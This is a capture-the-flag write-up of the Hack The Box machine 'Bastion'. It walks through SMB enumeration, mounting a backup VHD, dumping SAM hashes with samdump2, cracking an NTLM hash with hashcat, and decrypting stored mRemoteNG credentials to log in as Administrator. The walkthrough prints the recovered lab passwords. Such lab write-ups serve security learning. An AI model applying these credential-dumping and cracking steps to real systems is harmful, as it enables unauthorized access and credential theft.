Bastion - [HTB]

Cover Image for Bastion - [HTB]
Marmeus
Marmeus

Introduction

Bastion is an easy windows machine from Hack The Box where the attacker will have to mount a VHD file available in the smb service. Then, will have to crack the stored credentials in order to obtain the user flag. Finally, will have to find and decrypt the credentials from a installed software obtaining a shell as Administrator.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.134
Warning: 10.10.10.134 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.134
Host is up (0.041s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
[...]
# Nmap done at Mon Jul  5 11:24:03 2021 -- 1 IP address (1 host up) scanned in 82.59 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.052s latency).

PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
[...]
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m52s, deviation: 1h09m15s, median: 6s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-05T17:41:39+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-05T15:41:40
|_  start_date: 2021-07-05T05:58:41

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  5 11:41:40 2021 -- 1 IP address (1 host up) scanned in 64.96 seconds

Because there is a smb service let's enumerate its shares.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbmap -H 10.10.10.134 -u guest
[+] IP: 10.10.10.134:445        Name: 10.10.10.134                                      
[\] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\ZRVPGAGWIF, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Looking inside the Backups share there is a note warning us that we shouldn't download the entire share.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbclient  //10.10.10.134/Backups -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jul  5 12:33:05 2021
  ..                                  D        0  Mon Jul  5 12:33:05 2021
  nmap-test-file                      A      260  Mon Jul  5 12:00:49 2021
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2761155 blocks available
smb: \> get note.txt 
getting file \note.txt of size 116 as note.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion/smb$ cat note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Searching inside different folders there is a heavy 5GB file named 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd. VHD files are file formats representing a virtual hard disk drive (HDD).

smb: \> cd "WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
  .                                  Dn        0  Fri Feb 22 07:45:32 2019
  ..                                 Dn        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 07:45:32 2019
  BackupSpecs.xml                    An     1186  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 07:45:32 2019

                7735807 blocks of size 4096. 2761155 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> 

Because we can not download this file we need to create a network shared folder. For doing so, we need to execute the following commands.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mkdir /mnt/smb 
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb/
kali@kali:/mnt/smb$ ls
nmap-test-file  note.txt  SDT65CB.tmp WindowsImageBackup

Exploitation

Now that we have access to the file we can mount it using guestmount.

kali@kali:/mnt/smb$ sudo apt-get install libguestfs-tools -y
kali@kali:/mnt/smb$ sudo mkdir /mnt/vhd
kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo guestmount --add  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo su
root@kali:/mnt/vhd# ls
'$Recycle.Bin'   config.sys                pagefile.sys   ProgramData      Recovery                     Users
 autoexec.bat   'Documents and Settings'   PerfLogs      'Program Files'  'System Volume Information'   Windows

The virtual hard drive contains the files SAM and SYSTEM where user credentials are stored, for obtaining them we need to use the tool samdump2.

root@kali:/mnt/vhd/Windows/System32/config# samdump2 SYSTEM SAM  | tee /home/kali/Documents/HTB/Bastion/creds.txt
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Now, hashcat is able to retrieve the L4mpje's password from the NTLM hash.

kali@kali:~/Documents/HTB/Bastion$ hashcat -m 1000 creds.txt /usr/share/wordlists/rockyou.txt                   
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
=============================================================================================================================                                      
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU
Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31d6cfe0d16ae931b73c59d7e0c089c0:                
26112010952d963c8dc4217daec986d9:bureaulampje
[...]

These credentials can be used to become L4mpje through SSH.

kali@kali:~/Documents/HTB/Bastion$ ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.                
L4mpje@10.10.10.134's password: 
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>  

Privilege Escalation

Looking inside the machine's file system appears an unusual program named mRemoteNG. mRemoteNG is a fork of mRemote; an open source, tabbed, multi-protocol, remote connections manager for Windows.

l4mpje@BASTION C:\Program Files (x86)>dir                                                                           
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487
 Directory of C:\Program Files (x86)
22-02-2019  15:01    <DIR>          .                                                                               
22-02-2019  15:01    <DIR>          ..             
16-07-2016  15:23    <DIR>          Common Files
23-02-2019  10:38    <DIR>          Internet Explorer
16-07-2016  15:23    <DIR>          Microsoft.NET
22-02-2019  15:01    <DIR>          mRemoteNG
23-02-2019  11:22    <DIR>          Windows Defender
23-02-2019  10:38    <DIR>          Windows Mail
23-02-2019  11:22    <DIR>          Windows Media Player
16-07-2016  15:23    <DIR>          Windows Multimedia Platform
16-07-2016  15:23    <DIR>          Windows NT
23-02-2019  11:22    <DIR>          Windows Photo Viewer
16-07-2016  15:23    <DIR>          Windows Portable Devices
16-07-2016  15:23    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              14 Dir(s)  11.308.552.192 bytes free 

Searching about where credentials are stored, there is a post on reddit telling that are stored at %appdata%\mRemoteNG\confCons.xml .

l4mpje@BASTION C:\Program Files (x86)>type  %appdata%\mRemoteNG\confCons.xml  
[...]      
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
[...]
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"

Although they are encrypted we can decrypt them using mremoteng_decrypt.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
--2021-07-05 14:55:13--  https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’

mremoteng_decrypt.py                     100%[=================================================================================>]   1.50K  --.-KB/s    in 0s

2021-07-05 14:55:13 (3.12 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

The Administrator's password can be used to access to the machine as Administrator through SSH, getting the root flag.

kali@kali:~/Documents/HTB/Bastion$ ssh Administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
[CENSORED]

Finally, if you want to umount the folders under mnt execute the following commands.

root@kali:~# umount /mnt/smb
root@kali:~# guestunmount /mnt/vhd